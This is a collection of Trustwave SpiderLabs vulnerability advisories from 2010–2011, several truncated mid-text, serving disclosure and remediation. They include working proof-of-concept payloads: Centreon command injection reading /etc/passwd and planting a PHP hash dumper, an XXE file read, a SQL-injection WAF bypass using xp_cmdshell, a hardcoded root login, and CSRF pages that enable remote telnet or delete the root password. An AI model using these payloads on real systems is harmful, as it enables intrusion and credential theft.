TWSL2011-018: Authentication Bypass Vulnerability in IBM TS3100/TS3200 Web User Interface
Trustwave's SpiderLabs Security Advisory TWSL2011-018: Authentication Bypass Vulnerability in IBM TS3100/TS3200 Web User Interface https://www.trustwave.com/spiderlabs/advisories/TWSL2011-018.txt Published: 2011-12-20 Version: 1.0 Vendor: IBM (http://www.ibm.com) Product: TS3100/TS3200 Tape Library Version affected: Firmware less than A.60 Product description: Entry-level tape library designed to provide reliable,high capacity, high performance tape backup. The TS3100/TS3200 models and its storage management applications are designed to address capacity, performance, data protection, reliability, availability, affordability and application requirements. It is designed as a functionally rich, entry tape-storage solution incorporating LTO Ultrium tape technology. Credit: Martin Murfitt of Trustwave SpiderLabs Finding: Authentication Bypass (Web Management Console) CVE: CVE-2011-1372 The IBM TS3200/TS3200 Web User Interface is vulnerable to an authentication bypass attack. By sending a series of requests to the authentication function, it is possible to trigger a condition which causes the application to grant an access cookie which permits remote administration. Repeated queries using the following HTTP query arguments provided administrative access to the appliance after several tries: user_level=3password=aaalogin=Log+in' The password is not believed to be significant. Once access is granted, the following cookies are set on the client's browser: Cookie: RMU_LEVEL=3; RMU_LOGIN= Remediation Steps: Update firmware version to A.60 or above. Revision History: 1/17/11 - Vulnerability disclosed 11/18/11 - Patch released by vendor 12/20/11 - Advisory published References 1. http://www-03.ibm.com/systems/storage/tape/ts3200/ About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave's SpiderLabs: SpiderLabs is the advance security team at Trustwave responsible for incident response and forensics, ethical hacking and application security tests for Trustwave's clients. SpiderLabs has responded to hundreds of security incidents, performed thousands of ethical hacking exercises and tested the security of hundreds of business applications for Fortune 500 organizations. For more information visit https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided as is without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.
TWSL2011-017: Multiple Vulnerabilities in Merethis Centreon
Trustwave's SpiderLabs Security Advisory TWSL2011-017:
Multiple Vulnerabilities in Merethis Centreon
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-017.txt
Published: 2011-11-04
Version: 1.0
Vendor: Merethis (http://www.merethis.com and http://www.centreon.com)
Product: Centreon
Version affected: 2.3.1 and prior
Product description:
Centreon is network supervision and monitoring tool that is based upon
the Nagios open source monitoring engine. Centreon can be used as a
Nagios GUI and it can provide such features as real time system
monitoring, performance management and system management.
Credit: Christophe De La Fuente of Trustwave SpiderLabs
Finding 1: Remote Command Execution
Centreon supervision and monitoring tool provided by Merethis permits
remote code execution from the command help web page allowing an
attacker to execute arbitrary commands in the context of the webserver
hosting the application. Any account that has been granted the access
to Configuration Nagios Checks is able to execute commands.
The following Proof of Concept (PoC) executes the command
'cat /etc/passwd':
http://example.domain/centreon/main.php?p=60706command_name=/Centreon/SNMP/../../../../bin/cat%20/etc/passwd%20%23o=hmin=1
Finding 2: One-Way Hash Without a Salt
The following code at lines 329-349 from
www/include/configuration/nconfigObject/contact/DB-Func.php
shows the insertContactInDB() function inserting the MD5 or SHA1
password hash in the database without using a salt:
$rq = INSERT INTO `contact` ( .
`contact_id` , `timeperiod_tp_id` , `timeperiod_tp_id2` ,
`contact_name` , . `contact_alias` , `contact_autologin_key` ,
`contact_passwd` , `contact_lang` , `contact_template_id`, .
`contact_host_notification_options` ,
`contact_service_notification_options` , . `contact_email` ,
`contact_pager` , `contact_comment` , `contact_oreon`,
`contact_register`, `contact_enable_notifications` , .
`contact_admin` , `contact_type_msg`, `contact_activate`,
`contact_auth_type`, . `contact_ldap_dn`, `contact_location`,
`contact_address1`, `contact_address2`, . `contact_address3`,
`contact_address4`, `contact_address5`, `contact_address6`) .
VALUES ( ;
$rq .= NULL, ; isset($ret[timeperiod_tp_id]) $ret[timeperiod_tp_id]
!= NULL ? $rq .= '.$ret[timeperiod_tp_id].', : $rq .= NULL, ;
isset($ret[timeperiod_tp_id2]) $ret[timeperiod_tp_id2] != NULL ? $rq
.= '.$ret[timeperiod_tp_id2].', : $rq .= NULL, ;
isset($ret[contact_name]) $ret[contact_name] != NULL ? $rq .=
'.htmlentities($ret[contact_name], ENT_QUOTES, UTF-8).', : $rq .=
NULL, ;---isset($ret[contact_alias]) $ret[contact_alias] != NULL ?
$rq .= '.htmlentities($ret[contact_alias], ENT_QUOTES, UTF-8).', :
$rq .= NULL, ; isset($ret[contact_autologin_key])
$ret[contact_autologin_key] != NULL ? $rq .=
'.htmlentities($ret[contact_autologin_key], ENT_QUOTES).', : $rq .=
NULL, ; if ($encryptType == 1)
isset($ret[contact_passwd]) $ret[contact_passwd] != NULL ? $rq .=
'.md5($ret[contact_passwd]).', : $rq .= NULL, ;
else if ($encryptType == 2)
isset($ret[contact_passwd]) $ret[contact_passwd] != NULL ? $rq .=
'.sha1($ret[contact_passwd]).', : $rq .= NULL, ;
else
isset($ret[contact_passwd]) $ret[contact_passwd] != NULL ? $rq .=
'.md5($ret[contact_passwd]).', : $rq .= NULL, ;
The combination of unsalted hashes and Finding 1 allows an attacker to
recover passwords for all accounts. The following example illustrates
this attack.
The following php code will dump the hashes of all users:
?php require_once (/etc/centreon/centreon.conf.php); require_once
$classdir/centreonDB.class.php; $p=new CentreonDB(); $r=$p-query(SELECT
contact_passwd from centreon.contact); while ($w=$r-fetchRow()) {echo
$w[contact_passwd] . br;} ?
To upload and execute this code on the server, one method is to convert
the above php code to hexadecimal and use the remote code execution
method outlined in Finding 1 to create a server-side php file. The
length of the URL accepted in this case is limited, so the file must
be broken into three parts. The following requests create the php
file test.php:
http://example.domain/centreon/main.php?p=60706command_name=/Centreon/SNMP/../../../../usr/bin/printf%20\\x3c\\x3f\\x70\\x68\\x70\\x20\\x72\\x65\\x71\\x75\\x69\\x72\\x65\\x5f\\x6f\\x6e\\x63\\x65\\x20\\x28\\x22\\x2f\\x65\\x74\\x63\\x2f\\x63\\x65\\x6e\\x74\\x72\\x65\\x6f\\x6e\\x2f\\x63\\x65\\x6e\\x74\\x72\\x65\\x6f\\x6e\\x2e\\x63\\x6f\\x6e\\x66\\x2e\\x70\\x68\\x70\\x22\\x29\\x3b\\x20\\x72\\x65\\x71\\x75\\x69\\x72\\x65\\x5f\\x6f\\x6e\\x63\\x65\\x20\\x22\\x24\\x63\\x6c\\x61\\x73\\x73\\x64\\x69\\x72\\x2f\\x63\\x65\\x6e\\x74%20|tee%20-a%20test.php%20%23o=hmin=1
TWSL2011-014: Vulnerability in Pantech Web Browser SSL Implementation
Trustwave's SpiderLabs Security Advisory TWSL2011-014: Vulnerability in Pantech Web Browser SSL Implementation https://www.trustwave.com/spiderlabs/advisories/TWSL2011-014.txt Published: 2011-09-23 Version: 1.0 Vendor: Pantech (http://www.pantechusa.com) Product: Link P7040P, others may be vulnerable Version affected: JLUS040201 confirmed, others may be vulnerable Product description: The Pantech Link is a mobile phone supporting a 2.4 LCD screen and full keyboard that facilitates simple text messaging. Credit: Paul Kehrer of Trustwave SpiderLabs Finding: Vulnerability in Pantech Web Browser SSL Implementation Pantech Link/P7040P browser SSL certificate parsing contains a flaw where it fails to check the Basic Constraints parameter of certificates in the chain. By signing a new certificate using a legitimate end entity certificate, an attacker can obtain a valid certificate for any domain. For example: -TrustedCA --somedomain.com (legitimate certificate) ---api.someotherdomain.com (signed by somedomain.com) Using this technique any SSL traffic using the api.someotherdomain.com certificate can be intercepted transparently to the end user if the attacker is in control of the network. Revision History: 08/12/11 - Vulnerability Disclosed 09/23/11 - Advisory Published Remediation Steps: This vulnerability has not been addressed at the time of this advisory. Mobile users should be aware of this issue and proceed with caution when transmitting SSL traffic. About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave's SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided as is without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.
TWSL2011-013: Multiple Vulnerabilities in IceWarp Mail Server
Trustwave's SpiderLabs Security Advisory TWSL2011-013: Multiple Vulnerabilities in IceWarp Mail Server https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt Published: 2011-09-23 Version: 1.0 Vendor: IceWarp (http://www.icewarp.com) Product: IceWarp Mail Server Version affected: 10.3.2 and below Product description: IceWarp WebMail is the web front-end for the IceWarp Mail Server, which provides email access on over 50,000 servers. IceWarp WebMail provides web-based access to email, calendars, contacts, files and shared data from any computer with a browser and Internet connection. Credit: David Kirkpatrick of Trustwave's SpiderLabs Finding 1: XML External Entity Injection CVE: CVE-2011-3579 An external entity is a function of the XML specification which allows XML documents to reference resources external to the XML document. This functionality forces the XML parser of the application to access the resource specified. In this case it is possible to inject an XML DOCTYPE SYSTEM directive to access local files on the operating system where the IceWarp server is installed. Using this technique it is possible to retrieve readable files on the operating system. This attack can also be used to create a possible denial of service condition. Proof-of-Concept: The following POST request was sent to the host A.B.C.D where the IceWarp mail server was running: REQUEST = POST /-.._._.--.._1243848280/server/webmail.php HTTP/1.1 Host:A.B.C.D User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0 Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language:en-gb,en;q=0.5i've Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Proxy-Connection: keep-alive Referer: http://A.B.C.D Content-Length: 249 Content-Type: application/xml;charset=UTF-8 Pragma: no-cache Cache-Control: no-cache !DOCTYPE foo [!ENTITY xxeb91c4 SYSTEM file:///c:/windows/win.ini ]iq type=setquery xmlns=webmail:iq:authusernametestxxeb91c4;/usernamedigest828cd27c 6fb73ee32674602e9c5521f005c614f5fb9266fd071dab323b5079e02d47a421c01df2efffc d2bdb221e15bf2baa4acefe38f264d92d152878ca4d33/digestmethodRSA/method /query/iq RESPONSE: == HTTP/1.1 200 OK Server: IceWarp/9.4.2 Date: Wed, 20 Jul 2011 10:04:56 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/xml Vary: Accept-Encoding Content-Length: 1113 ?xml version=1.0 encoding=utf-8?iq type=errorerror uid=login_invalidtest; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 TRUNCATED The above proof-of-concept would retrieve the c:\windows\win.ini file (the response in this example has been truncated). Finding 2: PHP Information Disclosure CVE: CVE-2011-3580 It is possible to retrieve the PHP information file phpinfo() by accessing the following URL http://A.B.C.D/server where A.B.C.D is the IP of the server running the IceWarp software. The response will be a page detailing the PHP version used and the configuration settings of PHP, including system details. Vendor Response: These issues have been addressed as of version 10.3.3 Remediation Steps: Customers should update to the latest version of IceWarp Mail Server in order to address these issues. The above issues have been corrected in version 10.3.3. Revision History: 08/03/11 - Vulnerability disclosed 09/19/11 - Patch released 09/23/11 - Advisory published About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave's SpiderLabs: SpiderLabs is the advance security team at Trustwave responsible for incident response and forensics, ethical hacking and application security tests for Trustwave's clients. SpiderLabs has responded to hundreds of security incidents, performed thousands of ethical hacking exercises and tested the security of hundreds of business applications for Fortune 500 organizations. For more information visit https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this
TWSL2011-008: Focus Stealing Vulnerability in Android
Trustwave's SpiderLabs Security Advisory TWSL2011-008: Focus Stealing Vulnerability in Android https://www.trustwave.com/spiderlabs/advisories/TWSL2011-008.txt Published: 2011-08-06 Version: 1.0 Vendor: Google http://www.android.com/ Product: Android Versions affected: Tested on 2.1 - 2.3 Other versions may also be affected Product description: Android is an open-source software stack for mobile devices which includes an operating system, key applications, and middleware. The Android mobile operating system is based on a modified version of the Linux kernel. Android is currently owned and developed by Google. Credit: Sean Schulte of Trustwave Finding 1: Covert Focus Stealing Android uses Intents and Activities such that the preferred application is always used for any given content/context. For example, a URL can always be opened with the Browser, and an image can be opened with the Gallery, Gmail or Twitter. To make this seamless for the user, switching between Activities always uses the same animation, whether the Activity belongs to the same app or a different app. Additionally, a service running in the background is able to 1) determine which app is currently running in the foreground, and 2) display an Activity defined in its own app (ie, not the current foreground app). These two features combine to allow a malicious developer to run a service that looks for apps it knows how to attack, and display a login screen to the user when those apps run. For example, when the user opens an app which requires a login, the malicious service displays a screen that looks identical to the legitimate login screen. Android gives no indication that the login screen actually belongs to a different app, and the Activity-switching animation would be the same whether the real app had legitimately displayed its login screen. In the case of a pixel-perfect malicious login screen, the user would have no visual indication that the focus has switched from the legitimate screen. When the user supplies his credentials, they can be sent to a remote server, allowing the attacker to steal the user's credentials without his knowledge. Any app that supplies a login screen is vulnerable to this attack. Remediation Steps: This vulnerability has not been fixed at the time of this advisory. As an alternative solution, users should be cautious when downloading third-party applications. Because of the nature of the vulnerability, a malicious application must be installed for a user to be vulnerable. Revision History: 03/18/11 - Vulnerability Disclosed to Google 07/08/11 - Publication/Disclosure Discussed with Vendor 08/06/11 - Advisory Published About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave's SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided as is without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If
TWSL2011-007: iOS SSL Implementation Does Not Validate Certificate Chain
Trustwave's SpiderLabs Security Advisory TWSL2011-007: iOS SSL Implementation Does Not Validate Certificate Chain https://www.trustwave.com/spiderlabs/advisories/TWSL2011-007.txt Published: 2011-07-25 Version: 1.0 Vendor: Apple (http://www.apple.com) Product: iOS Version affected: Versions Prior to 5.0b4, 4.3.5, and 4.2.10 Product description: iOS is Apple's mobile operating system for the iPhone, iPod Touch, and iPad hardware platforms. Credit: Paul Kehrer of Trustwave Finding: iOS SSL Implementation Does Not Validate Certificate Chain CVE: CVE-2011-0228 iOS's SSL certificate parsing contains a flaw where it fails to check the basicConstraints parameter of certificates in the chain. By signing a new certificate using a legitimate end entity certificate, an attacker can obtain a valid certificate for any domain. For example: -TrustedCA --somedomain.com (legitimate certificate) ---api.someotherdomain.com (signed by somedomain.com) Using this technique any SSL traffic using the api.someotherdomain.com certificate can be intercepted and decrypted by the issuer. No notification of the invalid nature of the certificate is presented to the iOS user. This method allows for transparent man-in-the-middle attacks against encrypted iOS communications. Remediation Steps: Users should update to the latest version of iOS in order to address this issue. This vulnerability has been corrected in versions 5.0b4, 4.3.5, and 4.2.10. Revision History: 07/15/11 - Vulnerability Disclosed 07/25/11 - Patch Released 07/25/11 - Advisory Published References: 1. http://support.apple.com/kb/HT4824 2. http://support.apple.com/kb/HT4825 About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave's SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided as is without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.
TWSL2011-006: IBM Web Application Firewall Bypass
Trustwave's SpiderLabs Security Advisory TWSL2011-006: IBM Web Application Firewall Bypass https://www.trustwave.com/spiderlabs/advisories/TWSL2011-006.txt Published: 2011-06-21 Version: 1.0 Vendor: IBM Product: IBM Web Application Firewall These capabilities are included through SiteProtector 7.0 and later software within IBM Security Network IPS GX products, IBM Security Server Protection products, and IBM Security Multi-Function product lines during 2H of 2009. Versions affected: Tested against G400 IPS-G400-IB-1 (Intrusion Prevention Update: 2011-03-11 00:34:23 - version: 31.030) and GX4004 IPS-GX4004-IB-2 (Intrusion Prevention Update: 2011-03-10 23:49:15 - version: 31.030). Product description: IBM Web Application Firewall capabilities inside IBM IPS products complement IBM Security's portfolio of web application security offerings to deliver end-to-end Web application security solutions. Credit: Wendel Guglielmetti Henrique of Trustwave's SpiderLabs Finding: IBM Web Application Firewall Bypass The IBM Web Application Firewall can be evaded, allowing an attacker to exploit web vulnerabilities that the product intends to protect. The issue occurs when an attacker submits repeated occurrences of the same parameter. The example shown below uses the following environment: A web environment using Microsoft IIS, ASP .NET technology, Microsoft SQL Server 2000, being protected by the IBM Web Application Firewall. As expected, the following request will be identified and blocked (depending of configuration) by the IBM Web application firewall. http://sitename/find_ta_def.aspx?id=2571iid='; EXEC master..xp_cmdshell ping 10.1.1.3 -- IIS with ASP.NET (and even pure ASP) technology will concatenate the contents of a parameter if multiple entries are part of the request. http://sitename/find_ta_def.aspx?id=2571iid='; EXEC master..xp_cmdshell iid= ping 10.1.1.3 -- IIS with ASP.NET (and even pure ASP) technology will concatenate both entries of iid parameter, however it will include an comma , between them, resulting in the following output being sent to the database. '; EXEC master..xp_cmdshell , ping 10.1.1.3 -- The request above will be identified and blocked (depending of configuration) by IBM Web application firewall, because it appears that EXEC and xp_cmdshell trigger an attack pattern. However, it is possible to split all the spaces in multiple parameters. For example: http://sitename/find_ta_def.aspx?id=2571iid='; iid= EXEC iid= master..xp_cmdshell iid= ping 10.1.1.3 iid= -- The above request will bypass the affected IBM Web application firewall, resulting in the following output being sent to the database. '; , EXEC , master..xp_cmdshell , ping 10.1.1.3 , -- However, the above SQL code will not be properly executed because of the comma inserted on the SQL query, to solve this situation we will use SQL comments. http://sitename/find_ta_def.aspx?id=2571iid='; /*iid=1*/ EXEC /*iid=1*/ master..xp_cmdshell /*iid=1*/ ping 10.1.1.3 /*iid=1*/ -- The above request will bypass IBM Web application firewall, resulting in the following output being sent to the database, which is a valid and working SQL code. '; /*,1*/ EXEC /*,1*/ master..xp_cmdshell /*,1*/ ping 10.1.1.3 /*,1*/ -- The above code will execute the ping command on the Microsoft Windows backend, assuming the application was running with administrative privileges. This attack class is also referenced sometimes as HTTP Pollution Attack, HTTP Parameter Pollution (HPP) and HTTP Parameter Concatenation. The exploitability of this issue depends of the infrastructure (WebServer, Development Framework Technology, etc) technology being used. Remediation Steps: IBM has released fixes to the above issue in the Super Tuesday patch released in June. Refer to the references section of the advisory for further information released by IBM. Revision History: 04/07/11 - Vulnerability disclosed 06/16/11 - Patch released 06/21/11 - Advisory published References: 1. http://www.iss.net/security_center/reference/vuln/HTTP_Parameter_Abuse.htm 2. http://xforce.iss.net/xforce/xfdb/67178 About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and
TWSL2011-002:Vulnerabilities in Comcast DOCSIS 3.0 Business Gateways (SMCD3G-CCR)
Trustwave's SpiderLabs Security Advisory TWSL2011-002: Vulnerabilities in Comcast DOCSIS 3.0 Business Gateways (SMCD3G-CCR) https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt Published: 2011-02-04 Version: 1.0 Vendor: Comcast (http://comcast.com) and SMC (http://www.smc.com) Product: Comcast DOCSIS 3.0 Business Gateway - SMCD3G-CCR Version affected: Versions prior to 1.4.0.49.2 Product description: The Comcast DOCSIS 3.0 Business Gateway provides end-user termination of cable internet services for Comcast Business Class customers with enhanced services including Network Address Translation (NAT), firewalling, and Virtual Private Network (VPN) termination. Credit: Zack Fasel and Matthew Jakubowski of Trustwave's SpiderLabs Finding 1: Static Credentials CVE: CVE-2011-0885 All SMCD3G-CCR gateways provided by Comcast have an administrative login of mso with the password of D0nt4g3tme. These passwords are not provided as a part of the installation of the device and are not recommended to be changed, thus the majority of users are unaware of the default configuration. With these default credentials, internal attackers can modify device configurations to leverage more significant attacks, including redirection of DNS requests, creation of a remote VPN termination point, and modification of NAT entries. These credentials provide access to the web interface for management, as well as a telnet interface that provides shell access to the device. The mso login provides shell as UID 0 (root). Finding 2: Cross Site Request Forgery (CSRF) CVE: CVE-2011-0886 SMCD3G-CCR gateways provided by Comcast permit CSRF attacks against numerous management pages allowing an attacker to embed in a webpage a malicious request against the gateway's management interface. Through this, an attacker can modify device configuration and enable remote administration via a telnet shell and http. The following Proof of Concept (PoC) connects to the gateway, logs in, modifies the remote administration to allow any user to connect externally, and modifies the DNS information. ## smcd3g-csrf-poc.htm html body iframe src=./smcd3g-csrf-poc-1.htm width=1 height=1 /iframe iframe src=./smcd3g-csrf-poc-2.htm width=1 height=1 /iframe iframe src=./smcd3g-csrf-poc-3.htm width=1 height=1 /iframe /body /html ## smcd3g-csrf-poc-1.htm html body form action=http://10.1.10.1/goform/login; method=post name=tF input type=hidden name=user value=mso / input type=hidden name=pws value=D0nt4g3tme / /form script document.tF.submit(); /script /body /html ## smcd3g-csrf-poc-2.htm html body form action=http://10.1.10.1/goform/RemoteRange; name=RMangement method=post input type=hidden value=feat-admin-remote name=file input type=hidden value=admin/ name=dir input type=hidden name=RemoteRange value=0 / input type=hidden name=rm_access value=on / input type=hidden name=Remote0 value=0.0.0.0,0.0.0.0,1 / input type=hidden name=http_port value=8080 / input type=hidden name=http_enable value=on / input type=hidden name=http_flag value=1 / input type=hidden name=msoremote_enableCheck value=on / input type=hidden name=mso_remote_enable value=1 / input type=hidden name=remote_enable value=0 / input type=hidden name=https_enable value=on / input type=hidden name=https_port value=8181 / input type=hidden name=https_flag value=1 / input type=hidden name=telnet_enable value=on / input type=hidden name=telnet_port value=2323 / input type=hidden name=telnet_flag value=1 / input type=hidden name=Remote1= value= / /form /body /html script setTimeout(document.RMangement.submit(),4000); /script /body /html ## smcd3g-csrf-poc-3.htm html body form name=WanIPform action=http://10.1.10.1/goform/Basic; method=post input type=hidden value=feat-wan-ip name=file input type=hidden value=admin/ name=dir input type=hidden value=Fixed name=DNSAssign input type=hidden value=0 name=dhcpc_release input type=hidden value=0 name=dhcpc_renew input type=hidden value= name=domain_name input type=hidden value= name=WDn input type=hidden name=SysName value= / input type=hidden name=manual_dns_enable value=on / input type=hidden name=DAddr value=4.2.2.1 / input type=hidden name=DAddr0 value=4 / input type=hidden name=DAddr1 value=2 / input type=hidden name=DAddr2 value=2 / input type=hidden name=DAddr3 value=1 / input type=hidden name=PDAddr value=4.2.2.2 / input type=hidden name=PDAddr0 value=4 / input type=hidden name=PDAddr1 value=2 / input type=hidden name=PDAddr2 value=2 / input type=hidden name=PDAddr3 value=2 / /form script setTimeout(document.WanIPform.submit(),5000); /script /body /html If the PoC was embedded in any web page the targeted user visited while logged into the device, the attacker would be provided remote administration in to the gateway device include a telnet shell. This would allow the attacker to redirect traffic to a malicious end-point. Finding 3: Weak Session Management CVE: CVE-2011-0887 SMCD3G-CCR gateways provided by Comcast utilize a
TWSL-2010-008: Clear iSpot/Clearspot CSRF Vulnerabilities
Trustwave's SpiderLabs Security Advisory TWSL2010-008: Clear iSpot/Clearspot CSRF Vulnerabilities https://www.trustwave.com/spiderlabs/advisories/TWSL2010-008.txt Published: 2010-12-10 Version: 1.0 Vendor: Clear (http://www.clear.com http://www.clear.com/) Products: iSpot / ClearSpot 4G (http://www.clear.com/devices) Versions affected: The observed behavior the result of a design choice, and may be present on multiple versions. The specific versions used during testing are given below. iSpot version: 2.0.0.0 [R1679 (Jul 6 2010 17:57:37)] Clearspot versions: 2.0.0.0 [R1512 (May 31 2010 18:57:09)] 2.0.0.0 [R1786 (Aug 4 2010 20:09:06)] Firmware Version : 1.9.9.4 Hardware Version : R051.2 Device Name :IMW-C615W Device Manufacturer :INFOMARK (http://infomark.co.kr http://infomark.co.kr/) Product Description: iSpot and ClearSpot 4G are portable 4G devices, that allow users to share and broadcast their own personal WiFi network. The device connects up to 8 clients at the same time, on the same 4G connection. Credit: Matthew Jakubowski of Trustwave's SpiderLabs CVE: CVE-2010-4507 Finding: These devices are susceptible to Cross-Site Request Forgery (CSRF). An attacker that is able to coerce a ClearSpot / iSpot user into following a link can arbitrarily execute system commands on the device. The following examples will allow an attacker to enable remote access to the iSpot and ClearSpot 4G, and add their own account to the device. This level of access also provides a device's client-side SSL certificates, which are used to perform device authentication. This could lead to a compromise of ClearWire accounts as well as other personal information. Add new user: form method=post action=http://192.168.1.1/cgi-bin/webmain.cgi; http://192.168.1.1/cgi-bin/webmain.cgi%22 input type=hidden name=act value=act_cmd_result input type=hidden name=cmd value=adduser -S jaku input type=submit /form or img src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_cmd_resultcmd=adduser% 20-S%20jaku' Remove root password: form method=post action=http://192.168.1.1/cgi-bin/webmain.cgi; http://192.168.1.1/cgi-bin/webmain.cgi%22 input type=hidden name=act value=act_cmd_result input type=hidden name=cmd value=passwd -d root input type=submit /form or img src='http://192.168.1.1/cgi-bin/webmain.cgi?act=act_cmd_resultcmd=passwd%2 0-d%20root' Enable remote administration access: 